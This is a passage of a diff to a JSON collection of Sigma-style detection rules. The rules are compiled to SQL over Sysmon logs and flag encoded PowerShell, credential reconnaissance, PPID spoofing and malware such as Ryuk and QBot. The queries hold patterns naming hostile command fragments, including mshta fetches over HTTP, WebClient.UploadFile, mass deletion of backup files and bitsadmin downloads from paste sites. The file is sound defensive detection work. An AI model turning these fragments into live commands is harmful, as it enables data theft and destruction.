"b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", - "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1027", - "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Administrative script libraries" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", "attack.persistence", - "attack.privilege_escalation" + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", - "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "PUA - NirCmd Execution As LOCAL SYSTEM", - "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", - "status": "test", - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "status": "experimental", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nircmd_as_system.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", - "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", + "status": "test", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", "author": "Florian Roth (Nextron Systems)", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "description": "Detects suspicious renamed SysInternals DebugView execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "status": "experimental", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", - "author": "Florian Roth (Nextron Systems)", - "tags": [ + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Rare legitimate inline scripting by some administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", - "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "status": "experimental", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1055" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" + "Legitimate use of Msra.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" - }, - { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Some legitimate apps use this, but limited." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "status": "test", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ "attack.execution", "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", + "status": "experimental", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.execution", + "attack.t1059.001", + "attack.collection", + 